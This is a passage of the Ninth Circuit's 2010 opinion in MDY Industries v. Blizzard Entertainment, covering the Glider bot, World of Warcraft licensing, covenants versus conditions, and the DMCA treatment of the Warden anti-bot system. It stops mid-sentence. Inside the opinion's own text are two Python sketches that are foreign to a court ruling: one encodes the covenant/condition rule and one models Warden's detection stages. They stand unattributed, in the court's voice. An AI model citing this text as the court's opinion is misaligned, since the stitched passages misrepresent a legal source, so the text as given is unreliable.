BLIZZARD ENTERTAINMENT, INC. and VIVENDI GAMES, INC., Defendants-third-party-plaintiffs-Appellants,
v.
MICHAEL DONNELLY, Third-party-defendant-Appellee.
No. 09-16044
D.C. No. 2:06-CV-02555-DGC
OPINION
Appeal from the United States District Court
for the District of Arizona
David G. Campbell, District Judge, Presiding
Argued and Submitted
June 7, 2010—Seattle, Washington
Filed December 14, 2010
Before: William C. Canby, Jr., Consuelo M. Callahan and
Sandra S. Ikuta, Circuit Judges.
Opinion by Judge Callahan
COUNSEL
Lance C. Venable (argued) and Joseph R. Meaney of Venable, Campillo, Logan & Meaney, P.C., for plaintiff-appellant/cross-appellee MDY Industries LLC and plaintiff-appellant/third-party-defendant-appellee Michael Donnelly.
Christian S. Genetski (argued), Shane M. McGee, and Jacob A. Sommer of Sonnenschein Nath & Rosenthal LLP, for defendants-appellees/cross-appellants Blizzard Entertainment, Inc. and Vivendi Games, Inc.
George A. Riley, David R. Eberhart, and David S. Almeling of O’Melveny & Myers LLP, for amicus curiae Business Software Alliance.
Scott E. Bain, Keith Kupferschmid, and Mark Bohannon, for amicus curiae Software & Information Industry Association.
Brian W. Carver of the University of California, Berkeley, School of Information, and Sherwin Siy and Jef Pearlman, for amicus curiae Public Knowledge.
Robert H. Rotstein, Steven J. Metalitz, and J. Matthew Williams of Mitchell Silberberg & Knupp LLP, for amicus curiae Motion Picture Association of America, Inc.
OPINION
CALLAHAN, Circuit Judge:
Blizzard Entertainment, Inc. (“Blizzard”) is the creator of
World of Warcraft (“WoW”), a popular multiplayer online
role-playing game in which players interact in a virtual world
while advancing through the game’s 70 levels. MDY Indus-
tries, LLC and its sole member Michael Donnelly
(“Donnelly”) (sometimes referred to collectively as “MDY”)
developed and sold Glider, a software program that automati-
cally plays the early levels of WoW for players.
MDY brought this action for a declaratory judgment to
establish that its Glider sales do not infringe Blizzard’s copy-
right or other rights, and Blizzard asserted counterclaims
under the Digital Millennium Copyright Act (“DMCA”), 17
U.S.C. § 1201 et seq., and for tortious interference with con-
tract under Arizona law. The district court found MDY and
Donnelly liable for secondary copyright infringement, viola-
tions of DMCA §§ 1201(a)(2) and (b)(1), and tortious inter-
ference with contract. We reverse the district court except as
to MDY’s liability for violation of DMCA § 1201(a)(2) and
remand for trial on Blizzard’s claim for tortious interference
with contract.
I.
A. World of Warcraft
In November 2004, Blizzard created WoW, a “massively
multiplayer online role-playing game” in which players inter-
act in a virtual world. WoW has ten million subscribers, of
which two and a half million are in North America. The WoW
software has two components: (1) the game client software
that a player installs on the computer; and (2) the game server
software, which the player accesses on a subscription basis by
connecting to WoW’s online servers. WoW does not have
single-player or offline modes.
WoW players roleplay different characters, such as
humans, elves, and dwarves. A player’s central objective is to
advance the character through the game’s 70 levels by partici-
pating in quests and engaging in battles with monsters. As a
player advances, the character collects rewards such as in-
game currency, weapons, and armor. WoW’s virtual world
has its own economy, in which characters use their virtual
currency to buy and sell items directly from each other,
through vendors, or using auction houses. Some players also
utilize WoW’s chat capabilities to interact with others.
B. Blizzard’s use agreements
Each WoW player must read and accept Blizzard’s End
User License Agreement (“EULA”) and Terms of Use
(“ToU”) on multiple occasions. The EULA pertains to the
game client, so a player agrees to it both before installing the
game client and upon first running it. The ToU pertains to the
online service, so a player agrees to it both when creating an
account and upon first connecting to the online service. Play-
ers who do not accept both the EULA and the ToU may return
the game client for a refund.
C. Development of Glider and Warden
Donnelly is a WoW player and software programmer. In
March 2005, he developed Glider, a software “bot” (short for
robot) that automates play of WoW’s early levels, for his per-
sonal use. A user need not be at the computer while Glider is
running. As explained in the Frequently Asked Questions
(“FAQ”) on MDY’s website for Glider:
Glider . . . moves the mouse around and pushes keys
on the keyboard. You tell it about your character,
where you want to kill things, and when you want to
kill. Then it kills for you, automatically. You can do
something else, like eat dinner or go to a movie, and
when you return, you’ll have a lot more experience
and loot.
Glider does not alter or copy WoW’s game client software,
does not allow a player to avoid paying monthly subscription
dues to Blizzard, and has no commercial use independent of
WoW. Glider was not initially designed to avoid detection by
Blizzard.
The parties dispute Glider’s impact on the WoW experi-
ence. Blizzard contends that Glider disrupts WoW’s environ-
ment for non-Glider players by enabling Glider users to
advance quickly and unfairly through the game and to amass
additional game assets. MDY contends that Glider has a mini-
mal effect on non-Glider players, enhances the WoW experi-
ence for Glider users, and facilitates disabled players’ access
to WoW by auto-playing the game for them.
In summer 2005, Donnelly began selling Glider through
MDY’s website for fifteen to twenty-five dollars per license.
Prior to marketing Glider, Donnelly reviewed Blizzard’s
EULA and client-server manipulation policy. He reached the
conclusion that Blizzard had not prohibited bots in those doc-
uments.
In September 2005, Blizzard launched Warden, a technol-
ogy that it developed to prevent its players who use unautho-
rized third-party software, including bots, from connecting to
WoW’s servers. Warden was able to detect Glider, and Bliz-
zard immediately used Warden to ban most Glider users.
MDY responded by modifying Glider to avoid detection and
promoting its new anti-detection features on its website’s
FAQ. It added a subscription service, Glider Elite, which
offered “additional protection from game detection software”
for five dollars a month.
Thus, by late 2005, MDY was aware that Blizzard was pro-
hibiting bots. MDY modified its website to indicate that using
Glider violated Blizzard’s ToU. In November 2005, Donnelly
wrote in an email interview, “Avoiding detection is rather
exciting, to be sure. Since Blizzard does not want bots run-
ning at all, it’s a violation to use them.” Following MDY’s
anti-detection modifications, Warden only occasionally
detected Glider. As of September 2008, MDY had gross reve-
nues of $3.5 million based on 120,000 Glider license sales.
D. Financial and practical impact of Glider
Blizzard claims that from December 2004 to March 2008,
it received 465,000 complaints about WoW bots, several
thousand of which named Glider. Blizzard spends $940,000
annually to respond to these complaints, and the parties have
stipulated that Glider is the principal bot used by WoW play-
ers. Blizzard introduced evidence that it may have lost
monthly subscription fees from Glider users, who were able
to reach WoW’s highest levels in fewer weeks than players
playing manually. Donnelly acknowledged in a November
2005 email that MDY’s business strategy was to make Bliz-
zard’s anti-bot detection attempts financially prohibitive:
The trick here is that Blizzard has a finite amount of
development and test resources, so we want to make
it bad business to spend that much time altering their
detection code to find Glider, since Glider’s negative
effect on the game is debatable . . . . [W]e attack
th[is] weakness and try to make it a bad idea or make
their changes very risky, since they don’t want to
risk banning or crashing innocent customers.
E. Pre-litigation contact between MDY and Blizzard
In August 2006, Blizzard sent MDY a cease-and-desist let-
ter alleging that MDY’s website hosted WoW screenshots and
a Glider install file, all of which infringed Blizzard’s copy-
rights. Donnelly removed the screenshots and requested Bliz-
zard to clarify why the install file was infringing, but Blizzard
did not respond. In October 2006, Blizzard’s counsel visited
Donnelly’s home, threatening suit unless MDY immediately
ceased selling Glider and remitted all profits to Blizzard.
MDY immediately commenced this action.
II.
On December 1, 2006, MDY filed an amended complaint
seeking a declaration that Glider does not infringe Blizzard’s
copyright or other rights. In February 2007, Blizzard filed
counterclaims and third-party claims against MDY and Don-
nelly for, inter alia, contributory and vicarious copyright
infringement, violation of DMCA §§ 1201(a)(2) and (b)(1),
and tortious interference with contract.
In July 2008, the district court granted Blizzard partial sum-
mary judgment, finding that MDY’s Glider sales contribu-
torily and vicariously infringed Blizzard’s copyrights and
tortiously interfered with Blizzard’s contracts. The district
court also granted MDY partial summary judgment, finding
that MDY did not violate DMCA § 1201(a)(2) with respect to
accessing the game software’s source code.
In September 2008, the parties stipulated to entry of a $6
million judgment against MDY for the copyright infringement
and tortious interference with contract claims. They further
stipulated that Donnelly would be personally liable for the
same amount if found personally liable at trial. After a Janu-
ary 2009 bench trial, the district court held MDY liable under
DMCA §§ 1201(a)(2) and (b)(1). It also held Donnelly per-
sonally liable for MDY’s copyright infringement, DMCA vio-
lations, and tortious interference with contract.
On April 1, 2009, the district court entered judgment
against MDY and Donnelly for $6.5 million, an adjusted fig-
ure to which the parties stipulated based on MDY’s DMCA
liability and post-summary judgment Glider sales. The district
court permanently enjoined MDY from distributing Glider.
MDY’s efforts to stay injunctive relief pending appeal were
unsuccessful. On April 29, 2009, MDY timely filed this
appeal. On May 12, 2009, Blizzard timely cross-appealed the
district court’s holding that MDY did not violate DMCA
§§ 1201(a)(2) and (b)(1) as to the game software’s source
code.
III.
We review de novo the district court’s (1) orders granting
or denying summary judgment; (2) conclusions of law after a
bench trial; and (3) interpretations of state law. Padfield v.
AIG Life Ins., 290 F.3d 1121, 1124 (9th Cir. 2002); Twentieth
Century Fox Film Corp. v. Entm’t Distrib., 429 F.3d 869, 879
(9th Cir. 2005); Laws v. Sony Music Entm’t, Inc., 448 F.3d
1134, 1137 (9th Cir. 2006). We review the district court’s
findings of fact for clear error. Twentieth Century Fox, 429
F.3d at 879.
IV.
[1] We first consider whether MDY committed contribu-
tory or vicarious infringement (collectively, “secondary
infringement”) of Blizzard’s copyright by selling Glider to
WoW players.1 See ProCD, Inc. v. Zeidenberg, 86 F.3d 1447,
1454 (7th Cir. 1996) (“A copyright is a right against the
world. Contracts, by contrast, generally affect only their par-
ties.”). To establish secondary infringement, Blizzard must
first demonstrate direct infringement. See A&M Records, Inc.
v. Napster, Inc., 239 F.3d 1004, 1019, 1022 (9th Cir. 2001).
To establish direct infringement, Blizzard must demonstrate
copyright ownership and violation of one of its exclusive
rights by Glider users. Id. at 1013. MDY is liable for contribu-
tory infringement if it has “intentionally induc[ed] or
encourag[ed] direct infringement” by Glider users. MGM Stu-
dios Inc. v. Grokster, Ltd., 545 U.S. 913, 930 (2005). MDY
is liable for vicarious infringement if it (1) has the right and
ability to control Glider users’ putatively infringing activity
and (2) derives a direct financial benefit from their activity.
Id. If Glider users directly infringe, MDY does not dispute
that it satisfies the other elements of contributory and vicari-
ous infringement.
[2] As a copyright owner, Blizzard possesses the exclusive
right to reproduce its work. 17 U.S.C. § 106(1). The parties
agree that when playing WoW, a player’s computer creates a
1Alternatively, MDY asks that we determine whether there are any gen-
uine issues of material fact that warrant a remand for trial on Blizzard’s
secondary copyright infringement claims. We find none.
copy of the game’s software in the computer’s random access
memory (“RAM”), a form of temporary memory used by
computers to run software programs. This copy potentially
infringes unless the player (1) is a licensee whose use of the
software is within the scope of the license or (2) owns the
copy of the software. See Sun Microsystems, Inc. v. Microsoft
Corp., 188 F.3d 1115, 1121 (9th Cir. 1999) (“Sun I”); 17
U.S.C. § 117(a). As to the scope of the license, ToU § 4(B),
“Limitations on Your Use of the Service,” provides:
You agree that you will not . . . (ii) create or use
cheats, bots, “mods,” and/or hacks, or any other
third-party software designed to modify the World of
Warcraft experience; or (iii) use any third-party soft-
ware that intercepts, “mines,” or otherwise collects
information from or through the Program or Service.
By contrast, if the player owns the copy of the software, the
“essential step” defense provides that the player does not
infringe by making a copy of the computer program where the
copy is created and used solely “as an essential step in the uti-
lization of the computer program in conjunction with a
machine.” 17 U.S.C. § 117(a)(1).
A. Essential step defense
We consider whether WoW players, including Glider users,
are owners or licensees of their copies of WoW software. If
WoW players own their copies, as MDY contends, then
Glider users do not infringe by reproducing WoW software in
RAM while playing, and MDY is not secondarily liable for
copyright infringement.
[3] In Vernor v. Autodesk, Inc., we recently distinguished
between “owners” and “licensees” of copies for purposes of
the essential step defense. Vernor v. Autodesk, Inc., 621 F.3d
1102, 1108-09 (9th Cir. 2010); see also MAI Sys. Corp. v.
Peak Computer, Inc., 991 F.2d 511, 519 n.5 (9th Cir. 1993);
Triad Sys. Corp. v. Se. Express Co., 64 F.3d 1330, 1333,
1335-36 (9th Cir. 1995); Wall Data, Inc. v. Los Angeles
County Sheriff’s Dep’t, 447 F.3d 769, 784-85 (9th Cir. 2006).
In Vernor, we held “that a software user is a licensee rather
than an owner of a copy where the copyright owner (1) speci-
fies that the user is granted a license; (2) significantly restricts
the user’s ability to transfer the software; and (3) imposes
notable use restrictions.” 621 F.3d at 1111 (internal footnote
omitted).
[4] Applying Vernor, we hold that WoW players are
licensees of WoW’s game client software. Blizzard reserves
title in the software and grants players a non-exclusive, lim-
ited license. Blizzard also imposes transfer restrictions if a
player seeks to transfer the license: the player must (1) trans-
fer all original packaging and documentation; (2) permanently
delete all of the copies and installation of the game client; and
(3) transfer only to a recipient who accepts the EULA. A
player may not sell or give away the account.
[5] Blizzard also imposes a variety of use restrictions. The
game must be used only for non-commercial entertainment
purposes and may not be used in cyber cafes and computer
gaming centers without Blizzard’s permission. Players may
not concurrently use unauthorized third-party programs. Also,
Blizzard may alter the game client itself remotely without a
player’s knowledge or permission, and may terminate the
EULA and ToU if players violate their terms. Termination
ends a player’s license to access and play WoW. Following
termination, players must immediately destroy their copies of
the game and uninstall the game client from their computers,
but need not return the software to Blizzard.
[6] Since WoW players, including Glider users, do not
own their copies of the software, Glider users may not claim
the essential step defense. 17 U.S.C. § 117(a)(1). Thus, when
their computers copy WoW software into RAM, the players
may infringe unless their usage is within the scope of Bliz-
zard’s limited license.
B. Contractual covenants vs. license conditions
[7] “A copyright owner who grants a nonexclusive, limited
license ordinarily waives the right to sue licensees for copy-
right infringement, and it may sue only for breach of con-
tract.” Sun I, 188 F.3d at 1121 (internal quotations omitted).
However, if the licensee acts outside the scope of the license,
the licensor may sue for copyright infringement. Id. (citing
S.O.S., Inc. v. Payday, Inc., 886 F.2d 1081, 1087 (9th Cir.
1989)). Enforcing a copyright license “raises issues that lie at
the intersection of copyright and contract law.” Id. at 1122.
[8] We refer to contractual terms that limit a license’s
scope as “conditions,” the breach of which constitute copy-
right infringement. Id. at 1120. We refer to all other license
terms as “covenants,” the breach of which is actionable only
under contract law. Id. We distinguish between conditions and
covenants according to state contract law, to the extent consis-
tent with federal copyright law and policy. Foad Consulting
Group v. Musil Govan Azzalino, 270 F.3d 821, 827 (9th Cir.
2001).
[9] A Glider user commits copyright infringement by play-
ing WoW while violating a ToU term that is a license condi-
tion. To establish copyright infringement, then, Blizzard must
demonstrate that the violated term — ToU § 4(B) — is a con-
dition rather than a covenant. Sun I, 188 F.3d at 1122. Bliz-
zard’s EULAs and ToUs provide that they are to be
interpreted according to Delaware law. Accordingly, we first
construe them under Delaware law, and then evaluate whether
that construction is consistent with federal copyright law and
policy.
A covenant is a contractual promise, i.e., a manifestation of
intention to act or refrain from acting in a particular way, such
that the promisee is justified in understanding that the promi-
sor has made a commitment. See Travel Centers of Am. LLC
v. Brog, No. 3751-CC, 2008 Del. Ch. LEXIS 183, *9 (Del.
Ch. Dec. 5, 2008); see also Restatement (Second) of Con-
tracts § 2 (1981). A condition precedent is an act or event that
must occur before a duty to perform a promise arises. AES
P.R., L.P. v. Alstom Power, Inc., 429 F. Supp. 2d 713, 717 (D.
Del. 2006) (citing Delaware state law); see also Restatement
(Second) of Contracts § 224. Conditions precedent are disfa-
vored because they tend to work forfeitures. AES, 429 F.
Supp. 2d at 717 (internal citations omitted). Wherever possi-
ble, equity construes ambiguous contract provisions as cove-
nants rather than conditions. See Wilmington Tr. Co. v. Clark,
325 A.2d 383, 386 (Del. Ch. 1974). However, if the contract
is unambiguous, the court construes it according to its terms.
AES, 429 F. Supp. 2d at 717 (citing 17 Am. Jur. 2d Contracts
§ 460 (2006)).
[10] Applying these principles, ToU § 4(B)(ii) and (iii)’s
prohibitions against bots and unauthorized third-party soft-
ware are covenants rather than copyright-enforceable condi-
tions. See Greenwood v. CompuCredit Corp., 615 F.3d 1204,
1212, (9th Cir. 2010) (“[H]eadings and titles are not meant to
take the place of the detailed provisions of the text,” and . . .
“the heading of a section cannot limit the plain meaning of the
text.” (quoting Bhd. of R.R. Trainmen v. Balt. & Ohio R.R.,
331 U.S. 519, 528—29 (1947))). Although ToU § 4 is titled,
“Limitations on Your Use of the Service,” nothing in that sec-
tion conditions Blizzard’s grant of a limited license on play-
ers’ compliance with ToU § 4’s restrictions. To the extent that
the title introduces any ambiguity, under Delaware law, ToU
§ 4(B) is not a condition, but is a contractual covenant. Cf.
Sun Microsystems, Inc. v. Microsoft Corp., 81 F. Supp. 2d
1026, 1031-32 (N.D. Cal. 2000) (“Sun II”) (where Sun
licensed Microsoft to create only derivative works compatible
with other Sun software, Microsoft’s “compatibility obliga-
tions” were covenants because the license was not specifically
conditioned on their fulfillment).
To recover for copyright infringement based on breach of
a license agreement, (1) the copying must exceed the scope of
the defendant’s license and (2) the copyright owner’s com-
plaint must be grounded in an exclusive right of copyright
(e.g., unlawful reproduction or distribution). See Storage
Tech. Corp. v. Custom Hardware Eng’g & Consulting, Inc.,
421 F.3d 1307, 1315-16 (Fed. Cir. 2005). Contractual rights,
however, can be much broader:
[C]onsider a license in which the copyright owner
grants a person the right to make one and only one
copy of a book with the caveat that the licensee may
not read the last ten pages. Obviously, a licensee
who made a hundred copies of the book would be
liable for copyright infringement because the copy-
ing would violate the Copyright Act’s prohibition on
reproduction and would exceed the scope of the
license. Alternatively, if the licensee made a single
copy of the book, but read the last ten pages, the
only cause of action would be for breach of contract,
because reading a book does not violate any right
protected by copyright law.
Id. at 1316. Consistent with this approach, we have held that
the potential for infringement exists only where the licensee’s
action (1) exceeds the license’s scope (2) in a manner that
implicates one of the licensor’s exclusive statutory rights. See,
e.g., Sun I, 118 F.3d at 1121-22 (remanding for infringement
determination where defendant allegedly violated a license
term regulating the creation of derivative works).
2
2See also S.O.S., 886 F.2d at 1089 (remanding for infringement determi-
nation where licensee exceeded the license’s scope by preparing a modi-
fied version of software programs without licensor’s authorization); LGS
Architects, Inc. v. Concordia Homes, Inc., 434 F.3d 1150, 1154-57 (9th
Cir. 2006) (licensor likely to prove infringement where licensee used
architectural plans for project outside the license’s scope, where licensee’s
use may have included unauthorized reproduction, distribution, and public
[11] Here, ToU § 4 contains certain restrictions that are
grounded in Blizzard’s exclusive rights of copyright and other
restrictions that are not. For instance, ToU § 4(D) forbids cre-
ation of derivative works based on WoW without Blizzard’s
consent. A player who violates this prohibition would exceed
the scope of her license and violate one of Blizzard’s exclu-
sive rights under the Copyright Act. In contrast, ToU
§ 4(C)(ii) prohibits a player’s disruption of another player’s
game experience. Id. A player might violate this prohibition
while playing the game by harassing another player with
unsolicited instant messages. Although this conduct may vio-
late the contractual covenants with Blizzard, it would not vio-
late any of Blizzard’s exclusive rights of copyright. The anti-
bot provisions at issue in this case, ToU § 4(B)(ii) and (iii),
are similarly covenants rather than conditions. A Glider user
violates the covenants with Blizzard, but does not thereby
commit copyright infringement because Glider does not
infringe any of Blizzard’s exclusive rights. For instance, the
use does not alter or copy WoW software.
Were we to hold otherwise, Blizzard — or any software
copyright holder — could designate any disfavored conduct
during software use as copyright infringement, by purporting
to condition the license on the player’s abstention from the
disfavored conduct. The rationale would be that because the
conduct occurs while the player’s computer is copying the
software code into RAM in order for it to run, the violation
is copyright infringement. This would allow software copy-
right owners far greater rights than Congress has generally
conferred on copyright owners.
3
display of the plans); Frank Music Corp. v. Metro-Goldwyn-Mayer, Inc.,
772 F.2d 505, 511 (9th Cir. 1985) (hotel infringed copyright by publicly
performing copyrighted music with representations of movie scenes,
where its public performance license expressly prohibited the use of
accompanying visual representations).
3A copyright holder may wish to enforce violations of license agree-
ments as copyright infringements for several reasons. First, breach of con-
[12] We conclude that for a licensee’s violation of a con-
tract to constitute copyright infringement, there must be a
nexus between the condition and the licensor’s exclusive
rights of copyright.4 Here, WoW players do not commit copy-
right infringement by using Glider in violation of the ToU.
MDY is thus not liable for secondary copyright infringement,
which requires the existence of direct copyright infringement.
Grokster, 545 U.S. at 930.
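The covenant/condition rule applied in this Part has a compact
logical form: a licensee's violation supports a copyright claim
only when the violated term is a condition grounded in one of
the licensor's exclusive rights; otherwise the remedy lies in
contract. The short Python sketch below merely encodes that
classification together with the opinion's own examples; it is
an illustration, and the names are invented, not terms of art.

    # Schematic encoding of the covenant/condition rule; illustrative only.

    def cause_of_action(violates_term: bool, grounded_in_106: bool) -> str:
        """Classify a licensee's violation of a license term.

        grounded_in_106: the term is a condition grounded in an exclusive
        right of copyright (reproduction, derivative works, etc.).
        """
        if not violates_term:
            return "none"
        return ("copyright infringement" if grounded_in_106
                else "breach of contract only")

    # ToU 4(D) (no derivative works) is grounded in an exclusive right:
    print(cause_of_action(True, True))    # copyright infringement
    # ToU 4(C)(ii) (no harassment) and the anti-bot covenants are not:
    print(cause_of_action(True, False))   # breach of contract only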
It follows that because MDY does not infringe Blizzard’s
copyrights, we need not resolve MDY’s contention that Bliz-
zard commits copyright misuse. Copyright misuse is an equi-
table defense to copyright infringement, the contours of which
are still being defined. See Practice Mgmt. Info. Corp. v. Am.
Med. Ass’n, 121 F.3d 516, 520 (9th Cir. 1997). The remedy
for copyright misuse is to deny the copyright holder the right
to enforce its copyright during the period of misuse. Since
MDY does not infringe, we do not consider whether Blizzard
committed copyright misuse.
We thus reverse the district court’s grant of summary judg-
ment to Blizzard on its secondary copyright infringement
4 A licensee arguably may commit copyright infringement by continuing
to use the licensed work while failing to make required payments, even
though a failure to make payments otherwise lacks a nexus to the licen-
sor’s exclusive statutory rights. We view payment as sui generis, however,
because of the distinct nexus between payment and all commercial copy-
right licenses, not just those concerning software.
claims. Accordingly, we must also vacate the portion of the
district court’s permanent injunction that barred MDY and
Donnelly from “infringing, or contributing to the infringement
of, Blizzard’s copyrights in WoW software.”
V.
After MDY began selling Glider, Blizzard launched War-
den, its technology designed to prevent players who used bots
from connecting to the WoW servers. Blizzard used Warden
to ban most Glider users in September 2005. Blizzard claims
that MDY is liable under DMCA §§ 1201(a)(2) and (b)(1)
because it thereafter programmed Glider to avoid detection by
Warden.
A. The Warden technology
Warden has two components. The first is a software mod-
ule called “scan.dll,” which scans a computer’s RAM prior to
allowing the player to connect to WoW’s servers. If scan.dll
detects that a bot is running, such as Glider, it will not allow
the player to connect and play. After Blizzard launched War-
den, MDY reconfigured Glider to circumvent scan.dll by not
loading itself until after scan.dll completed its check. War-
den’s second component is a “resident” component that runs
periodically in the background on a player’s computer when
it is connected to WoW’s servers. It asks the computer to
report portions of the WoW code running in RAM, and it
looks for patterns of code associated with known bots or
cheats. If it detects a bot or cheat, it boots the player from the
game, which halts the computer’s copying of copyrighted
code into RAM.
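As described, Warden is a two-stage access control: a
pre-connection gate (scan.dll) plus a periodic in-session check
(the resident component) that revokes access on detection. The
Python sketch below restates only that architecture; nothing in
the record supplies Warden's actual code, and every identifier
and signature here is invented for illustration.

    # Schematic model of Warden's two components as described above.
    # Hypothetical names and signatures; this is not Blizzard's code.

    KNOWN_BOT_PATTERNS = [b"bot-signature"]  # placeholder pattern list

    def scan_dll_check(ram_snapshot: bytes) -> bool:
        """Pre-connection gate: scan RAM before allowing a connection."""
        return not any(sig in ram_snapshot for sig in KNOWN_BOT_PATTERNS)

    def resident_check(reported_code: bytes) -> bool:
        """Periodic in-session check of code the client reports from RAM."""
        return not any(sig in reported_code for sig in KNOWN_BOT_PATTERNS)

    def session(snapshots):
        """First snapshot is the pre-connection scan; the rest model the
        resident component's periodic reports. Returns the outcome."""
        it = iter(snapshots)
        if not scan_dll_check(next(it)):
            return "connection refused"   # stage 1: initial access blocked
        for report in it:
            if not resident_check(report):
                # Stage 2: access revoked; booting the player halts
                # further copying of code into RAM.
                return "booted from game"
        return "session completed"

    # A bot that loads only after the pre-connection scan (as Glider was
    # reconfigured to do) evades stage 1 but can still be caught by stage 2.
    print(session([b"clean", b"clean", b"...bot-signature..."]))  # booted

On this model the two stages share a single purpose, preventing
detectable bots from continuing to access the software, which is
how the opinion treats the two components below.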
B. The Digital Millennium Copyright Act
Congress enacted the DMCA in 1998 to conform United
States copyright law to its obligations under two World Intel-
lectual Property Organization (“WIPO”) treaties, which
require contracting parties to provide effective legal remedies
against the circumvention of protective technological mea-
sures used by copyright owners. See Universal City Studios,
Inc. v. Corley, 273 F.3d 429, 440 (2d Cir. 2001). In enacting
the DMCA, Congress sought to mitigate the problems pre-
sented by copyright enforcement in the digital age. Id. The
DMCA contains three provisions directed at the circumven-
tion of copyright owners’ technological measures. The
Supreme Court has yet to construe these provisions, and they
raise questions of first impression in this circuit.
The first provision, 17 U.S.C. § 1201(a)(1)(A), is a general
prohibition against “circumventing a technological measure
that effectively controls access to a work protected under [the
Copyright Act].” The second prohibits trafficking in technol-
ogy that circumvents a technological measure that “effec-
tively controls access” to a copyrighted work. 17 U.S.C.
§ 1201(a)(2). The third prohibits trafficking in technology that
circumvents a technological measure that “effectively pro-
tects” a copyright owner’s right. 17 U.S.C. § 1201(b)(1).
C. The district court’s decision
The district court assessed whether MDY violated DMCA
§§ 1201(a)(2) and (b)(1) with respect to three WoW compo-
nents. First, the district court considered the game client soft-
ware’s literal elements: the source code stored on players’
hard drives. Second, the district court considered the game
client software’s individual non-literal elements: the
400,000+ discrete visual and audible components of the
game, such as a visual image of a monster or its audible roar.
Finally, it considered the game’s dynamic non-literal ele-
ments: that is, the “real-time experience of traveling through
different worlds, hearing their sounds, viewing their struc-
tures, encountering their inhabitants and monsters, and
encountering other players.”
The district court granted MDY partial summary judgment
as to Blizzard’s § 1201(a)(2) claim with respect to WoW’s lit-
eral elements. The district court reasoned that Warden does
not effectively control access to the literal elements because
WoW players can access the literal elements without connect-
ing to a game server and encountering Warden; they need
only install the game client software on their computers. The
district court also ruled for MDY following trial as to Bliz-
zard’s § 1201(a)(2) claim with respect to WoW’s individual
non-literal elements, reasoning that these elements could also
be accessed on a player’s hard drive without encountering
Warden.
The district court, however, ruled for Blizzard following
trial as to its §§ 1201(a)(2) and (b)(1) claims with respect to
WoW’s dynamic non-literal elements, or the “real-time expe-
rience” of playing WoW. It reasoned that Warden effectively
controlled access to these elements, which could not be
accessed without connecting to Blizzard’s servers. It also
found that Glider allowed its users to circumvent Warden by
avoiding or bypassing its detection features, and that MDY
marketed Glider for use in circumventing Warden.
We turn to consider whether Glider violates DMCA
§§ 1201(a)(2) and (b)(1) by allowing users to circumvent
Warden to access WoW’s various elements. MDY contends
that Warden’s scan.dll and resident components are separate,
and only scan.dll should be considered as a potential access
control measure under § 1201(a)(2). However, in our view, an
access control measure can both (1) attempt to block initial
access and (2) revoke access if a secondary check determines
that access was unauthorized. Our analysis considers War-
den’s scan.dll and resident components together because the
two components have the same purpose: to prevent players
using detectable bots from continuing to access WoW soft-
ware.
D. Construction of § 1201
One of the issues raised by this appeal is whether certain
provisions of § 1201 prohibit circumvention of access con-
trols when access does not constitute copyright infringement.
To answer this question and others presented by this appeal,
we address the nature and interrelationship of the various pro-
visions of § 1201 in the overall context of the Copyright Act.
We begin by considering the scope of DMCA § 1201’s
three operative provisions, §§ 1201(a)(1), 1201(a)(2), and
1201(b)(1). We consider them side-by-side, because “[w]e do
not . . . construe statutory phrases in isolation; we read stat-
utes as a whole. Thus, the [term to be construed] must be read
in light of the immediately following phrase . . . .” United
States v. Morton, 467 U.S. 822, 828 (1984); see also Padash
v. I.N.S., 358 F.3d 1161, 1170 (9th Cir. 2004) (we analyze the
statutory provision to be construed “in the context of the gov-
erning statute as a whole, presuming congressional intent to
create a coherent regulatory scheme”).
1. Text of the operative provisions
“We begin, as always, with the text of the statute.” Hawaii
v. Office of Hawaiian Affairs, 129 S. Ct. 1436, 1443 (2009)
(quoting Permanent Mission of India to United Nations v.
City of New York, 551 U.S. 193, 197 (2007)). Section
1201(a)(1)(A) prohibits “circumvent[ing] a technological
measure that effectively controls access to a work protected
under this title.” Sections 1201(a)(2) and (b)(1) provide that
“[n]o person shall manufacture, import, offer to the public,
provide, or otherwise traffic in any technology, product, ser-
vice, device, component, or part thereof, that —
(A) is primarily designed or produced for the purpose of circum-
venting a technological measure that effectively controls access
to a work protected under this title [in § 1201(b)(1): circum-
venting protection afforded by a technological measure that
effectively protects a right of a copyright owner under this
title in a work or a portion thereof];
(B) has only limited commercially significant purpose or use
other than to circumvent such measure [such protection]; or
(C) is marketed by that person or another acting in concert
with that person with that person’s knowledge for use in circum-
venting such measure [such protection].
17 U.S.C. §§ 1201(a)(2), (b)(1)
(emphasis added).
2. Our harmonization of the DMCA’s operative
provisions
[13] For the reasons set forth below, we believe that
§ 1201 is best understood to create two distinct types of
claims. First, § 1201(a) prohibits the circumvention of any
technological measure that effectively controls access to a
protected work and grants copyright owners the right to
enforce that prohibition. Cf. Corley, 273 F.3d at 441 (“[T]he
focus of subsection 1201(a)(2) is circumvention of technolo-
gies designed to prevent access to a work”). Second, and in
contrast to § 1201(a), § 1201(b)(1) prohibits trafficking in
technologies that circumvent technological measures that
effectively protect “a right of a copyright owner.” Section
1201(b)(1)’s prohibition is thus aimed at circumventions of
measures that protect the copyright itself: it entitles copyright
owners to protect their existing exclusive rights under the
Copyright Act. Those exclusive rights are reproduction, distri-
bution, public performance, public display, and creation of
derivative works. 17 U.S.C. § 106. Historically speaking, pre-
venting “access” to a protected work in itself has not been a
right of a copyright owner arising from the Copyright Act.5
[14] Our construction of § 1201 is compelled by the four
significant textual differences between §§ 1201(a) and (b).
First, § 1201(a)(2) prohibits the circumvention of a measure
that “effectively controls access to a work protected under
this title,” whereas § 1201(b)(1) concerns a measure that “ef-
fectively protects a right of a copyright owner under this title
in a work or portion thereof.” (emphasis added). We read
§ 1201(b)(1)’s language — “right of a copyright owner under
this title” — to reinforce copyright owners’ traditional exclu-
sive rights under § 106 by granting them an additional cause
of action against those who traffic in circumventing devices
that facilitate infringement. Sections 1201(a)(1) and (a)(2),
however, use the term “work protected under this title.” Nei-
ther of these two subsections explicitly refers to traditional
copyright infringement under § 106. Accordingly, we read
this term as extending a new form of protection, i.e., the right
to prevent circumvention of access controls, broadly to works
protected under Title 17, i.e., copyrighted works.
Second, as used in § 1201(a), to “circumvent a technologi-
cal measure” means “to descramble a scrambled work, to
decrypt an encrypted work, or otherwise to avoid, bypass,
remove, deactivate, or impair a technological measure, with-
out the authority of the copyright owner.” 17 U.S.C.
5 17 U.S.C. § 106; see also Jay Dratler, Cyberlaw: Intellectual Prop. in
the Digital Millennium, § 1.02 (2009) (stating that the DMCA’s “protec-
tion is also quite different from the traditional exclusive rights of the copy-
right holder . . . [where the] exclusive rights never implicated access to the
work, as such”).
§ 1201(a)(3)(A). These two specific examples of unlawful cir-
